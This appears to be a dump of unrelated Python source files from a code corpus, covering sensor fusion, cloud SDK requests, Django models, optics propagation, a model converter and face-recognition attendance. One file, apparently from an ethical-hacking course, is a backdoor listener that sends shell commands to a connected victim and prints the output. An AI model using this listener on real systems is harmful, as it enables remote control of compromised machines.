q_am : numpy.ndarray
Estimated attitude.
"""
return ecompass(acc, mag, frame='NED', representation='quaternion')
def update(self, q: np.ndarray, gyr: np.ndarray, acc: np.ndarray, mag: np.ndarray = None, dt: float = None) -> np.ndarray:
"""
Attitude Estimation from given measurements and previous orientation.
The new orientation is first estimated with the angular velocity, then
another orientation is computed using the accelerometers and
magnetometers. The magnetometer is optional.
Each orientation is estimated independently and fused with a
complementary filter.
.. math::
\\mathbf{q} = (1 - \\alpha) \\mathbf{q}_\\omega + \\alpha\\mathbf{q}_{am}
Parameters
----------
q : numpy.ndarray
A-priori quaternion.
gyr : numpy.ndarray
Sample of tri-axial Gyroscope in rad/s.
acc : numpy.ndarray
Sample of tri-axial Accelerometer in m/s^2.
mag : numpy.ndarray, default: None
Sample of tri-axial Magnetometer in uT.
dt : float, default: None
Time step, in seconds, between consecutive Quaternions.
Returns
-------
q : numpy.ndarray
Estimated quaternion.
"""
dt = self.Dt if dt is None else dt
if gyr is None or not np.linalg.norm(gyr) > 0:
return q
q_omega = self.attitude_propagation(q, gyr, dt)
q_am = self.am_estimation(acc, mag)
# Complementary Estimation
if np.linalg.norm(q_omega + q_am) < np.sqrt(2):
q = (1.0 - self.gain)*q_omega - self.gain*q_am
else:
q = (1.0 - self.gain)*q_omega + self.gain*q_am
return q/np.linalg.norm(q)
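# Minimal usage sketch with synthetic sensor data (the gyr/acc/mag values below
# are illustrative assumptions, not reference measurements). Because of the
# relative import above, run it as a module, e.g.
# ``python -m ahrs.filters.complementary``.
if __name__ == "__main__":
    num_samples = 100
    gyr_data = 0.01 * np.random.randn(num_samples, 3)           # rad/s
    acc_data = np.tile([0.0, 0.0, 9.81], (num_samples, 1))      # m/s^2
    acc_data += 0.05 * np.random.randn(num_samples, 3)
    mag_data = np.tile([16.0, 0.5, -34.0], (num_samples, 1))    # uT
    estimator = Complementary(gyr=gyr_data, acc=acc_data, mag=mag_data,
                              frequency=100.0, gain=0.9)
    print(estimator.Q.shape)  # (100, 4): one quaternion per sample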
| 2.515625 | 3 |
aliyun-python-sdk-ehpc/aliyunsdkehpc/request/v20180412/EditJobTemplateRequest.py | yndu13/aliyun-openapi-python-sdk | 1,001 | 7866 | <gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkehpc.endpoint import endpoint_data
class EditJobTemplateRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'EHPC', '2018-04-12', 'EditJobTemplate')
self.set_method('GET')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_StderrRedirectPath(self):
return self.get_query_params().get('StderrRedirectPath')
def set_StderrRedirectPath(self,StderrRedirectPath):
self.add_query_param('StderrRedirectPath',StderrRedirectPath)
def get_ClockTime(self):
return self.get_query_params().get('ClockTime')
def set_ClockTime(self,ClockTime):
self.add_query_param('ClockTime',ClockTime)
def get_CommandLine(self):
return self.get_query_params().get('CommandLine')
def set_CommandLine(self,CommandLine):
self.add_query_param('CommandLine',CommandLine)
def get_ArrayRequest(self):
return self.get_query_params().get('ArrayRequest')
def set_ArrayRequest(self,ArrayRequest):
self.add_query_param('ArrayRequest',ArrayRequest)
def get_PackagePath(self):
return self.get_query_params().get('PackagePath')
def set_PackagePath(self,PackagePath):
self.add_query_param('PackagePath',PackagePath)
def get_Mem(self):
return self.get_query_params().get('Mem')
def set_Mem(self,Mem):
self.add_query_param('Mem',Mem)
def get_StdoutRedirectPath(self):
return self.get_query_params().get('StdoutRedirectPath')
def set_StdoutRedirectPath(self,StdoutRedirectPath):
self.add_query_param('StdoutRedirectPath',StdoutRedirectPath)
def get_Variables(self):
return self.get_query_params().get('Variables')
def set_Variables(self,Variables):
self.add_query_param('Variables',Variables)
def get_RunasUser(self):
return self.get_query_params().get('RunasUser')
def set_RunasUser(self,RunasUser):
self.add_query_param('RunasUser',RunasUser)
def get_ReRunable(self):
return self.get_query_params().get('ReRunable')
def set_ReRunable(self,ReRunable):
self.add_query_param('ReRunable',ReRunable)
def get_Thread(self):
return self.get_query_params().get('Thread')
def set_Thread(self,Thread):
self.add_query_param('Thread',Thread)
def get_TemplateId(self):
return self.get_query_params().get('TemplateId')
def set_TemplateId(self,TemplateId):
self.add_query_param('TemplateId',TemplateId)
def get_Priority(self):
return self.get_query_params().get('Priority')
def set_Priority(self,Priority):
self.add_query_param('Priority',Priority)
def get_Gpu(self):
return self.get_query_params().get('Gpu')
def set_Gpu(self,Gpu):
self.add_query_param('Gpu',Gpu)
def get_Node(self):
return self.get_query_params().get('Node')
def set_Node(self,Node):
self.add_query_param('Node',Node)
def get_Task(self):
return self.get_query_params().get('Task')
def set_Task(self,Task):
self.add_query_param('Task',Task)
def get_Name(self):
return self.get_query_params().get('Name')
def set_Name(self,Name):
self.add_query_param('Name',Name)
def get_Queue(self):
return self.get_query_params().get('Queue')
def set_Queue(self,Queue):
self.add_query_param('Queue',Queue) | 1.632813 | 2 |
tests/common/models/test_execution.py | angry-tony/ceph-lcm-decapod | 41 | 7867 | # -*- coding: utf-8 -*-
# Copyright (c) 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for decapod_common.models.execution."""
import pytest
from decapod_common.models import execution
def test_create(new_execution, new_pcmodel, pymongo_connection):
db_model = pymongo_connection.db.execution.find_one(
{"_id": new_execution._id}
)
assert db_model
assert new_execution.model_id == db_model["model_id"]
assert new_execution.version == db_model["version"]
assert new_execution.time_created == db_model["time_created"]
assert new_execution.time_deleted == db_model["time_deleted"]
assert new_execution.initiator_id == db_model["initiator_id"]
assert new_execution.playbook_configuration_model_id == \
db_model["pc_model_id"]
assert new_execution.playbook_configuration_version == \
db_model["pc_version"]
assert new_execution.state.name == db_model["state"]
assert new_execution.state == execution.ExecutionState.created
assert new_execution.playbook_configuration_model_id == \
new_pcmodel.model_id
assert new_execution.playbook_configuration_version == \
new_pcmodel.version
@pytest.mark.parametrize("state", execution.ExecutionState)
def test_change_state_ok(state, new_execution):
new_execution.state = state
new_execution.save()
assert new_execution.state == state
@pytest.mark.parametrize("state", (
"", "changed", "started", 0, None, -1.0, [], {}, object(), set()
))
def test_change_state_fail(state, new_execution):
with pytest.raises(ValueError):
new_execution.state = state
@pytest.mark.parametrize("state", execution.ExecutionState)
def test_api_response(state, new_pcmodel, new_execution):
new_execution.state = state
new_execution.save()
assert new_execution.make_api_structure() == {
"id": new_execution.model_id,
"initiator_id": new_execution.initiator_id,
"time_deleted": new_execution.time_deleted,
"time_updated": new_execution.time_created,
"model": execution.ExecutionModel.MODEL_NAME,
"version": 2,
"data": {
"playbook_configuration": {
"id": new_pcmodel.model_id,
"version": new_pcmodel.version,
"playbook_name": new_pcmodel.playbook_id
},
"state": state.name
}
}
def test_getting_logfile(new_execution, execution_log_storage):
new_execution.logfile
execution_log_storage.get.assert_called_once_with(new_execution.model_id)
def test_create_logfile(new_execution, execution_log_storage):
new_execution.new_logfile.write("1")
execution_log_storage.delete.assert_called_once_with(
new_execution.model_id
)
execution_log_storage.new_file.assert_called_once_with(
new_execution.model_id,
filename="{0}.log".format(new_execution.model_id),
content_type="text/plain"
)
execution_log_storage.new_file().write.assert_called_once_with("1")
| 1.882813 | 2 |
board/models.py | Fahreeve/TaskManager | 0 | 7868 | from django.contrib.auth.models import User
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Task(models.Model):
CLOSE = 'cl'
CANCEL = 'ca'
LATER = 'la'
UNDEFINED = 'un'
CHOICES = (
(UNDEFINED, _("Неизвестно")),
(CLOSE, _("Завершить")),
(CANCEL, _("Отменить")),
(LATER, _("Отложить")),
)
title = models.CharField(_("Заголовок"), max_length=50)
description = models.TextField(_("Описание"))
executor = models.ForeignKey(User, verbose_name=_("Исполнитель"), on_delete=models.CASCADE)
status = models.CharField(_("Статус"), choices=CHOICES, default=UNDEFINED, max_length=2)
deadline = models.DateTimeField(_("Дедлайн"))
priority = models.IntegerField(_("Приоритет"), default=1, validators=[MinValueValidator(1), MaxValueValidator(3)])
changed = models.DateTimeField(_("Дата последнего изменения"), auto_now=True)
created = models.DateTimeField(_("Дата создания"), auto_now_add=True)
@property
def text_status(self):
choices = dict(self.CHOICES)
return choices[self.status]
@property
def text_deadline(self):
return self.deadline.strftime("%d.%m.%Y %H:%M")
class Comment(models.Model):
task = models.ForeignKey(Task, related_name="comments", on_delete=models.CASCADE)
creator = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
text = models.TextField(_('Комментарий'))
created = models.DateTimeField(_("Дата создания"), auto_now_add=True)
| 2.0625 | 2 |
test/test_hex_line.py | bicobus/Hexy | 72 | 7869 | import numpy as np
import hexy as hx
def test_get_hex_line():
expected = [
[-3, 3, 0],
[-2, 2, 0],
[-1, 2, -1],
[0, 2, -2],
[1, 1, -2],
]
start = np.array([-3, 3, 0])
end = np.array([1, 1, -2])
print(hx.get_hex_line(start, end))
    print(expected)
    assert np.array_equal(hx.get_hex_line(start, end), expected)
if __name__ == "__main__":
test_get_hex_line()
| 2.984375 | 3 |
wofry/propagator/propagators2D/integral.py | PaNOSC-ViNYL/wofry | 0 | 7870 | <reponame>PaNOSC-ViNYL/wofry<filename>wofry/propagator/propagators2D/integral.py
# propagate_2D_integral: Simplification of the Kirchhoff-Fresnel integral. TODO: Very slow and gives some problems
import numpy
from wofry.propagator.wavefront2D.generic_wavefront import GenericWavefront2D
from wofry.propagator.propagator import Propagator2D
# TODO: check resulting amplitude normalization (fft and srw likely agree, convolution gives too high amplitudes, so needs normalization)
class Integral2D(Propagator2D):
HANDLER_NAME = "INTEGRAL_2D"
def get_handler_name(self):
return self.HANDLER_NAME
def do_specific_progation_after(self, wavefront, propagation_distance, parameters, element_index=None):
return self.do_specific_progation(wavefront, propagation_distance, parameters, element_index=element_index)
def do_specific_progation_before(self, wavefront, propagation_distance, parameters, element_index=None):
return self.do_specific_progation( wavefront, propagation_distance, parameters, element_index=element_index)
"""
2D Fresnel-Kirchhoff propagator via simplified integral
NOTE: this propagator is experimental and much less performant than the ones using Fourier Optics
Therefore, it is not recommended to use.
:param wavefront:
:param propagation_distance: propagation distance
:param shuffle_interval: it is known that this method replicates the central diffraction spot
                            The distance of the replica is proportional to 1/pixelsize
To avoid that, it is possible to change a bit (randomly) the coordinates
of the wavefront. shuffle_interval controls this shift: 0=No shift. A typical
value can be 1e5.
The result shows a diffraction pattern without replica but with much noise.
:param calculate_grid_only: if set, it calculates only the horizontal and vertical profiles, but returns the
full image with the other pixels to zero. This is useful when calculating large arrays,
so it is set as the default.
:return: a new 2D wavefront object with propagated wavefront
"""
def do_specific_progation(self, wavefront, propagation_distance, parameters, element_index=None):
shuffle_interval = self.get_additional_parameter("shuffle_interval",False,parameters,element_index=element_index)
calculate_grid_only = self.get_additional_parameter("calculate_grid_only",True,parameters,element_index=element_index)
return self.propagate_wavefront(wavefront,propagation_distance,shuffle_interval=shuffle_interval,
calculate_grid_only=calculate_grid_only)
@classmethod
def propagate_wavefront(cls,wavefront,propagation_distance,shuffle_interval=False,calculate_grid_only=True):
#
# Fresnel-Kirchhoff integral (neglecting inclination factor)
#
if not calculate_grid_only:
#
# calculation over the whole detector area
#
p_x = wavefront.get_coordinate_x()
p_y = wavefront.get_coordinate_y()
wavelength = wavefront.get_wavelength()
amplitude = wavefront.get_complex_amplitude()
det_x = p_x.copy()
det_y = p_y.copy()
p_X = wavefront.get_mesh_x()
p_Y = wavefront.get_mesh_y()
det_X = p_X
det_Y = p_Y
amplitude_propagated = numpy.zeros_like(amplitude,dtype='complex')
wavenumber = 2 * numpy.pi / wavelength
for i in range(det_x.size):
for j in range(det_y.size):
if not shuffle_interval:
rd_x = 0.0
rd_y = 0.0
else:
rd_x = (numpy.random.rand(p_x.size,p_y.size)-0.5)*shuffle_interval
rd_y = (numpy.random.rand(p_x.size,p_y.size)-0.5)*shuffle_interval
r = numpy.sqrt( numpy.power(p_X + rd_x - det_X[i,j],2) +
numpy.power(p_Y + rd_y - det_Y[i,j],2) +
numpy.power(propagation_distance,2) )
amplitude_propagated[i,j] = (amplitude / r * numpy.exp(1.j * wavenumber * r)).sum()
output_wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(det_x,det_y,amplitude_propagated)
else:
x = wavefront.get_coordinate_x()
y = wavefront.get_coordinate_y()
X = wavefront.get_mesh_x()
Y = wavefront.get_mesh_y()
wavenumber = 2 * numpy.pi / wavefront.get_wavelength()
amplitude = wavefront.get_complex_amplitude()
used_indices = wavefront.get_mask_grid(width_in_pixels=(1,1),number_of_lines=(1,1))
indices_x = wavefront.get_mesh_indices_x()
indices_y = wavefront.get_mesh_indices_y()
indices_x_flatten = indices_x[numpy.where(used_indices == 1)].flatten()
indices_y_flatten = indices_y[numpy.where(used_indices == 1)].flatten()
X_flatten = X[numpy.where(used_indices == 1)].flatten()
Y_flatten = Y[numpy.where(used_indices == 1)].flatten()
complex_amplitude_propagated = amplitude*0
print("propagate_2D_integral: Calculating %d points from a total of %d x %d = %d"%(
X_flatten.size,amplitude.shape[0],amplitude.shape[1],amplitude.shape[0]*amplitude.shape[1]))
for i in range(X_flatten.size):
r = numpy.sqrt( numpy.power(wavefront.get_mesh_x() - X_flatten[i],2) +
numpy.power(wavefront.get_mesh_y() - Y_flatten[i],2) +
numpy.power(propagation_distance,2) )
complex_amplitude_propagated[int(indices_x_flatten[i]),int(indices_y_flatten[i])] = (amplitude / r * numpy.exp(1.j * wavenumber * r)).sum()
output_wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(x_array=x,
y_array=y,
z_array=complex_amplitude_propagated,
wavelength=wavefront.get_wavelength())
# added <EMAIL> 2018-03-23 to conserve energy - TODO: review method!
output_wavefront.rescale_amplitude( numpy.sqrt(wavefront.get_intensity().sum() /
output_wavefront.get_intensity().sum()))
return output_wavefront
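# Minimal usage sketch (assumes ``wf`` is an existing GenericWavefront2D, for
# example one built with GenericWavefront2D.initialize_wavefront_from_arrays as
# done above; the distance and flags are illustrative values):
#
#   propagated_wf = Integral2D.propagate_wavefront(wf,
#                                                  propagation_distance=1.0,
#                                                  shuffle_interval=False,
#                                                  calculate_grid_only=True)
#   intensity = propagated_wf.get_intensity()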
| 2.875 | 3 |
Problems/Study Plans/Dynamic Programming/Dynamic Programming I/07_delete_and_earn.py | andor2718/LeetCode | 1 | 7871 | <filename>Problems/Study Plans/Dynamic Programming/Dynamic Programming I/07_delete_and_earn.py
# https://leetcode.com/problems/delete-and-earn/
class Solution:
def deleteAndEarn(self, nums: list[int]) -> int:
num_profits = dict()
for num in nums:
num_profits[num] = num_profits.get(num, 0) + num
sorted_nums = sorted(num_profits.keys())
second_last_profit = 0
last_profit = num_profits[sorted_nums[0]]
for idx in range(1, len(sorted_nums)):
profit_with_curr_num = num_profits[sorted_nums[idx]]
if sorted_nums[idx - 1] == sorted_nums[idx] - 1:
curr_profit = max(last_profit,
second_last_profit + profit_with_curr_num)
else:
curr_profit = last_profit + profit_with_curr_num
second_last_profit, last_profit = last_profit, curr_profit
return last_profit
| 3.375 | 3 |
Desafio051.py | GabrielSanchesRosa/Python | 0 | 7872 | <gh_stars>0
# Write a program that reads the first term and the common difference of an arithmetic progression. At the end, show the first 10 terms of that progression.
primeiro = int(input("Primeiro Termo: "))
razao = int(input("Razão: "))
decimo = primeiro + (10 - 1) * razao
for c in range(primeiro, decimo + razao, razao):
print(f"{c}", end=" -> ")
print("Acabou")
| 3.953125 | 4 |
tiddlyweb/filters/limit.py | tiddlyweb/tiddlyweb | 57 | 7873 | """
A :py:mod:`filter <tiddlyweb.filters>` type to limit a group of entities
using a syntax similar to SQL Limit::
limit=<index>,<count>
limit=<count>
"""
import itertools
def limit_parse(count='0'):
"""
Parse the argument of a ``limit`` :py:mod:`filter <tiddlyweb.filters>`
for a count and index argument, return a function which does the limiting.
Exceptions while parsing are passed up the stack.
"""
index = '0'
if ',' in count:
index, count = count.split(',', 1)
index = int(index)
count = int(count)
def limiter(entities, indexable=False, environ=None):
return limit(entities, index=index, count=count)
return limiter
def limit(entities, count=0, index=0):
"""
Make a slice of a list of entities based on a count and index.
"""
return itertools.islice(entities, index, index + count)
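# Usage sketch (not part of the original module): parsing a "5,10"-style
# argument yields a limiter that skips the first 5 entities and takes the
# next 10.
# limiter = limit_parse('5,10')
# first_ten = list(limiter(range(100)))   # [5, 6, ..., 14]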
| 3.328125 | 3 |
pytorch_keras_converter/API.py | sonibla/pytorch_keras_converter | 17 | 7874 | """
Simple API to convert models between PyTorch and Keras
(Conversions from Keras to PyTorch aren't implemented)
"""
from . import utility
from . import tests
from . import io_utils as utils
import tensorflow
def convert(model,
input_shape,
weights=True,
quiet=True,
ignore_tests=False,
input_range=None,
save=None,
filename=None,
directory=None):
"""
Conversion between PyTorch and Keras
(Conversions from Keras to PyTorch aren't implemented)
Arguments:
-model:
A Keras or PyTorch model or layer to convert
-input_shape:
Input shape (list, tuple or int), without batchsize.
-weights (bool):
Also convert weights. If set to false, only convert model
architecture
-quiet (bool):
        If True, hide the progress bar and the progress messages
-ignore_tests (bool):
        Whether the reliability tests should be ignored.
        If set to True, the converted model is still tested as a
        precaution, but if the models are not identical it will
        only print a warning.
If set to False, and models are not identical, RuntimeWarning will
be raised
If weights is False, tests are automatically ignored
-input_range:
        Optional.
A list of 2 elements containing max and min values to give as
input to the model when performing the tests. If None, models will
be tested on samples from the "standard normal" distribution.
-save:
If model should be exported to a hdf5 file.
-filename:
Filename to give to model's hdf5 file. If filename is not None and
save is not False, then save will automatically be set to True
-directory:
Where to save model's hdf5 file. If directory is not None and
save is not False, then save will automatically be set to True
Raises:
-RuntimeWarning:
If converted and original model aren't identical, and ignore_tests
is False
Returns:
If model has been exported to a file, it will return the name of the
file
Else, it returns the converted model
"""
if (filename is not None or directory is not None) and save is None:
save = True
if save is None:
save = False
if weights == False:
ignore_tests = True
if not quiet:
print('\nConversion...')
# Converting:
newModel = utility.convert(model=utility.LayerRepresentation(model),
input_size=input_shape,
weights=weights,
quiet=quiet)
# Actually, newModel is a LayerRepresentation object
# Equivalents:
torchModel = newModel.equivalent['torch']
kerasModel = newModel.equivalent['keras']
if not quiet:
print('Automatically testing converted model reliability...\n')
# Checking converted model reliability
tested = False
try:
meanSquaredError = tests.comparison(model1=torchModel,
model2=kerasModel,
input_shape=input_shape,
input_range=input_range,
quiet=quiet)
tested = True
except tensorflow.errors.InvalidArgumentError:
print("Warning: tests unavailable!")
if tested and meanSquaredError > 0.0001:
if ignore_tests:
print("Warning: converted and original models aren't identical !\
(mean squared error: {})".format(meanSquaredError))
else:
raise RuntimeWarning("Original and converted model do not match !\
                \nOn random input data, outputs showed a mean squared error of {} (it should \
be below 1e-10)".format(meanSquaredError))
elif not quiet and tested:
print('\n Original and converted models match !\nMean squared err\
or : {}'.format(meanSquaredError))
if save:
if not quiet:
print('Saving model...')
defaultName = 'conversion_{}'.format(newModel.name)
if filename is None:
filename = defaultName
# Formatting filename so that we don't overwrite any existing file
file = utils.formatFilename(filename,
directory)
# Freezing Keras model (trainable = False everywhere)
utils.freeze(kerasModel)
# Save the entire model
kerasModel.save(file + '.h5')
if not quiet:
print('Done !')
return file + '.h5'
if not quiet:
print('Done !')
return kerasModel
def convert_and_save(model,
input_shape,
weights=True,
quiet=True,
ignore_tests=False,
input_range=None,
filename=None,
directory=None):
"""
Conversion between PyTorch and Keras, and automatic save
(Conversions from Keras to PyTorch aren't implemented)
Arguments:
-model:
A Keras or PyTorch model or layer to convert
-input_shape:
Input shape (list, tuple or int), without batchsize.
-weights (bool):
Also convert weights. If set to false, only convert model
architecture
-quiet (bool):
        If True, hide the progress bar and the progress messages
-ignore_tests (bool):
        Whether the reliability tests should be ignored.
        If set to True, the converted model is still tested as a
        precaution, but if the models are not identical it will
        only print a warning.
If set to False, and models are not identical, RuntimeWarning will
be raised
If weights is False, tests are automatically ignored
-input_range:
        Optional.
A list of 2 elements containing max and min values to give as
input to the model when performing the tests. If None, models will
be tested on samples from the "standard normal" distribution.
-filename:
Filename to give to model's hdf5 file. If filename is not None and
save is not False, then save will automatically be set to True
-directory:
Where to save model's hdf5 file. If directory is not None and
save is not False, then save will automatically be set to True
Returns:
Name of created hdf5 file
"""
return convert(model=model,
input_shape=input_shape,
weights=weights,
quiet=quiet,
ignore_tests=ignore_tests,
input_range=input_range,
save=True,
filename=filename,
directory=directory)
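# Hedged usage sketch (not part of the original module; assumes torchvision is
# installed and that this file is importable as pytorch_keras_converter.API):
# import torchvision
# from pytorch_keras_converter import API
# keras_model = API.convert(torchvision.models.resnet18(),
#                           input_shape=(3, 224, 224), quiet=False)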
| 3.53125 | 4 |
examples/enable_notifications.py | kjwill/bleak | 0 | 7875 | # -*- coding: utf-8 -*-
"""
Notifications
-------------
Example showing how to add notifications to a characteristic and handle the responses.
Updated on 2019-07-03 by hbldh <<EMAIL>>
"""
import sys
import logging
import asyncio
import platform
from bleak import BleakClient
from bleak import _logger as logger
CHARACTERISTIC_UUID = "f000aa65-0451-4000-b000-000000000000" # <--- Change to the characteristic you want to enable notifications from.
ADDRESS = (
"24:71:89:cc:09:05" # <--- Change to your device's address here if you are using Windows or Linux
if platform.system() != "Darwin"
else "B9EA5233-37EF-4DD6-87A8-2A875E821C46" # <--- Change to your device's address here if you are using macOS
)
if len(sys.argv) == 3:
ADDRESS = sys.argv[1]
CHARACTERISTIC_UUID = sys.argv[2]
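# Usage sketch (derived from the argv handling above):
#   python enable_notifications.py <device-address> <characteristic-uuid>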
def notification_handler(sender, data):
"""Simple notification handler which prints the data received."""
print("{0}: {1}".format(sender, data))
async def run(address, debug=False):
if debug:
import sys
l = logging.getLogger("asyncio")
l.setLevel(logging.DEBUG)
h = logging.StreamHandler(sys.stdout)
h.setLevel(logging.DEBUG)
l.addHandler(h)
logger.addHandler(h)
async with BleakClient(address) as client:
logger.info(f"Connected: {client.is_connected}")
await client.start_notify(CHARACTERISTIC_UUID, notification_handler)
await asyncio.sleep(5.0)
await client.stop_notify(CHARACTERISTIC_UUID)
if __name__ == "__main__":
import os
os.environ["PYTHONASYNCIODEBUG"] = str(1)
loop = asyncio.get_event_loop()
# loop.set_debug(True)
loop.run_until_complete(run(ADDRESS, True))
| 2.90625 | 3 |
pyrules/storages/base.py | miraculixx/pyrules | 17 | 7876 | <reponame>miraculixx/pyrules<gh_stars>10-100
class BaseStorage(object):
def get_rule(self, name):
raise NotImplementedError()
def get_ruleset(self, name):
raise NotImplementedError()
| 1.8125 | 2 |
src/15 listener_and_backdoor/listener_2.py | raminjafary/ethical-hacking | 0 | 7877 | <filename>src/15 listener_and_backdoor/listener_2.py<gh_stars>0
#!/usr/bin/python
import socket
class Listener:
def __init__(self,ip,port):
listener = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
#options to reuse sockets
#listener.bind(("localhost",1234))
listener.bind((ip,port))
listener.listen(0)
print "[+] Waiting for Incoming Connection"
        #listen for connections; backlog is set to 0 so we don't need to worry about it
self.connection,address = listener.accept()
print "[+] Got a Connection from " + str(address)
def execute_remotely(self,command):
self.connection.send(command)
return self.connection.recv(1024)
def run(self):
while True:
command = raw_input(">> ")
result = self.execute_remotely(command)
print result
my_listener = Listener("localhost",1234)
my_listener.run() | 2.953125 | 3 |
dialogflow/history2xls.py | ray-hrst/temi-tools | 1 | 7878 | <filename>dialogflow/history2xls.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Convert Dialogflow history to spreadsheet
User must manually copy the history from the browser and save this in a text file.
This reads the textfile, parses the data, and saves it to a spreadsheet.
Example training sample:
USER
サワディカ
Nov 4, 11:19 PM
AGENT
No matched intent
Nov 4, 11:19 PM
more_vert
"""
import argparse
import os
from simple_report import SimpleReport
# constants
FIELDS = ["Date", "User", "Agent"]
if __name__ == "__main__":
# collect arguments
PARSER = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
PARSER.add_argument("filename", help="History text file")
ARGS = PARSER.parse_args()
# generate report
filename, file_extension = os.path.splitext(ARGS.filename)
REPORT = SimpleReport(filename, FIELDS)
    # step through each line of the history text file
with open(ARGS.filename, 'r') as fp:
num_lines = sum(1 for line in open(ARGS.filename))
rows = int(num_lines / 7)
print("Reading {} lines of text.".format(num_lines))
print("Writing {} rows.".format(rows))
for row in range(1, rows):
user_utterance = fp.readline().strip() # USER UTTERANCE
date = fp.readline().strip() # DATE
agent_intent = fp.readline().strip() # AGENT INTENT
date = fp.readline().strip() # DATE
_ = fp.readline().strip() # 'more_vert'
utterance = user_utterance.split("USER", 1)[1]
intent = agent_intent.split("AGENT", 1)[1]
if not intent:
intent = "Intent found"
print("[{}] {} {} {}".format(row, date, utterance, intent))
# add row to report
REPORT.add("Date", row, date, date)
REPORT.add("User", row, utterance)
REPORT.add("Agent", row, intent)
REPORT.close()
| 3.515625 | 4 |
recognition/views.py | usathe71-u/Attendance-System-Face-Recognition | 3 | 7879 | from django.shortcuts import render,redirect
from .forms import usernameForm,DateForm,UsernameAndDateForm, DateForm_2
from django.contrib import messages
from django.contrib.auth.models import User
import cv2
import dlib
import imutils
from imutils import face_utils
from imutils.video import VideoStream
from imutils.face_utils import rect_to_bb
from imutils.face_utils import FaceAligner
import time
from attendance_system_facial_recognition.settings import BASE_DIR
import os
import face_recognition
from face_recognition.face_recognition_cli import image_files_in_folder
import pickle
from sklearn.preprocessing import LabelEncoder
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
import numpy as np
from django.contrib.auth.decorators import login_required
import matplotlib as mpl
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE
import datetime
from django_pandas.io import read_frame
from users.models import Present, Time
import seaborn as sns
import pandas as pd
from django.db.models import Count
#import mpld3
import matplotlib.pyplot as plt
from pandas.plotting import register_matplotlib_converters
from matplotlib import rcParams
import math
mpl.use('Agg')
#utility functions:
def username_present(username):
if User.objects.filter(username=username).exists():
return True
return False
def create_dataset(username):
id = username
if(os.path.exists('face_recognition_data/training_dataset/{}/'.format(id))==False):
os.makedirs('face_recognition_data/training_dataset/{}/'.format(id))
directory='face_recognition_data/training_dataset/{}/'.format(id)
# Detect face
	#Loading the HOG face detector and the shape predictor for alignment
print("[INFO] Loading the facial detector")
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('face_recognition_data/shape_predictor_68_face_landmarks.dat') #Add path to the shape predictor ######CHANGE TO RELATIVE PATH LATER
fa = FaceAligner(predictor , desiredFaceWidth = 96)
#capture images from the webcam and process and detect the face
# Initialize the video stream
print("[INFO] Initializing Video stream")
vs = VideoStream(src=0).start()
#time.sleep(2.0) ####CHECK######
# Our identifier
# We will put the id here and we will store the id with a face, so that later we can identify whose face it is
# Our dataset naming counter
sampleNum = 0
# Capturing the faces one by one and detect the faces and showing it on the window
while(True):
# Capturing the image
#vs.read each frame
frame = vs.read()
#Resize each image
frame = imutils.resize(frame ,width = 800)
#the returned img is a colored image but for the classifier to work we need a greyscale image
#to convert
gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#To store the faces
#This will detect all the images in the current frame, and it will return the coordinates of the faces
#Takes in image and some other parameter for accurate result
faces = detector(gray_frame,0)
#In above 'faces' variable there can be multiple faces so we have to get each and every face and draw a rectangle around it.
for face in faces:
print("inside for loop")
(x,y,w,h) = face_utils.rect_to_bb(face)
face_aligned = fa.align(frame,gray_frame,face)
			# Whenever the program captures the face, we will write it in a folder
# Before capturing the face, we need to tell the script whose face it is
# For that we will need an identifier, here we call it id
# So now we captured a face, we need to write it in a file
sampleNum = sampleNum+1
# Saving the image dataset, but only the face part, cropping the rest
if face is None:
print("face is none")
continue
cv2.imwrite(directory+'/'+str(sampleNum)+'.jpg' , face_aligned)
face_aligned = imutils.resize(face_aligned ,width = 400)
#cv2.imshow("Image Captured",face_aligned)
# @params the initial point of the rectangle will be x,y and
# @params end point will be x+width and y+height
# @params along with color of the rectangle
# @params thickness of the rectangle
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1)
# Before continuing to the next loop, I want to give it a little pause
# waitKey of 100 millisecond
cv2.waitKey(50)
#Showing the image in another window
#Creates a window with window name "Face" and with the image img
cv2.imshow("Add Images",frame)
		#Before closing it we need to give a wait command, otherwise the open cv won't work
# @params with the millisecond of delay 1
cv2.waitKey(1)
#To get out of the loop
if(sampleNum>300):
break
	#Stopping the videostream
vs.stop()
# destroying all the windows
cv2.destroyAllWindows()
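# Runs the face-recognition SVC on the encoding of the aligned face crop and
# returns (predicted class index, probability); the class is [-1] when no
# encoding can be computed or the best probability is not above the threshold.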
def predict(face_aligned,svc,threshold=0.7):
face_encodings=np.zeros((1,128))
try:
